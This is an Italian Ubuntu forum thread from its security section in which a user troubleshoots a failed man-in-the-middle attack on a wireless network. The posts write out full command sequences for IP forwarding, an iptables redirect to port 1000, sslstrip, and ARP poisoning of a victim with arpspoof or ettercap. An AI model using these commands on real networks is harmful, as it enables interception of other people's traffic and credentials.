Ubuntu 11.10 - Nessun redirect durante i Mitm [iptables?]

Sicurezza del sistema: firewall, antispam, antivirus, ssh, patch, bug, eccetera.
Evicaro
Prode Principiante
Messaggi: 15
Iscrizione: martedì 26 ottobre 2010, 13:57
Località: Torino

Ubuntu 11.10 - Nessun redirect durante i Mitm [iptables?]

Messaggio da Evicaro »

Ciao a tutti,

ho un bisogno disperato (per la mia sanità mentale, dato che sto impazzendo dietro questo problema da stamattina) di riuscire a capire perchè se faccio un MITM qualsiasi, il traffico non viene rediretto.

Non riesco ne con ettercap (testuale), ne con arpspoof.

Il mitm funziona perchè se vado sul pc vittima a controllare l'arp è effettivamente avvelenata... peccato che abbia causato un bel DOS più che un MITM...

Sslstrip funziona perchè se sul browser del mio pc metto come proxy localhost con la porta di sslstrip (uso la 1000) cattura il traffico senza problemi...

Questa è la procedura con arpspoof, tutto da root ovviamente:

Codice: Seleziona tutto


echo "1" > /proc/sys/net/ipv4/ip_forward 

cat /proc/sys/net/ipv4/ip_forward (giusto per controllare)

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 1000

sslstrip -l -k 1000

arpspoof -i wlan0 -t IP_VITTIMA IP_GATEWAY
Questa è la procedura con Ettercap, sempre da root:

Codice: Seleziona tutto


echo "1" > /proc/sys/net/ipv4/ip_forward 

cat /proc/sys/net/ipv4/ip_forward (sempre per controllare)

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 1000

sslstrip -l -k 1000

ettercap -i wlan0 -Tq -M ARP:remote /IP_VITTIMA/ //
Ho googlato per due giorni prima di aprire un thread, ma non riesco a capire il perchè... vi prego aiutatemi!!!

EDIT: mi era scappato un sudo di troppo... ma in realtà tutti i comandi sono lanciati tutti da root, quindi poco importa...
Ultima modifica di Evicaro il giovedì 12 aprile 2012, 19:20, modificato 1 volta in totale.
Jambaz
Prode Principiante
Messaggi: 51
Iscrizione: mercoledì 23 novembre 2011, 17:18

Re: Ubuntu 11.10 - Nessun redirect durante i Mitm [iptables?]

Messaggio da Jambaz »

ma poi dopo aver fatto iptables come lanci le due procedure ?
Evicaro
Prode Principiante
Messaggi: 15
Iscrizione: martedì 26 ottobre 2010, 13:57
Località: Torino

Re: Ubuntu 11.10 - Nessun redirect durante i Mitm [iptables?]

Messaggio da Evicaro »

Jambaz ha scritto: ma poi dopo aver fatto iptables come lanci le due procedure ?
Non so se ho capito bene la domanda... ma ad ogni modo apro due terminali nuovi da root e li lancio... cambia solo l'ultimo comando in base a se voglio fare arp poisoning con arpspoof o con ettercap... (e preferisco ettercap perchè arpspoof non rearpa le vittime ad attacco ultimato)...
Scrivi risposta

Ritorna a “Sicurezza”

Chi c’è in linea

Visualizzano questa sezione: 0 utenti iscritti e 9 ospiti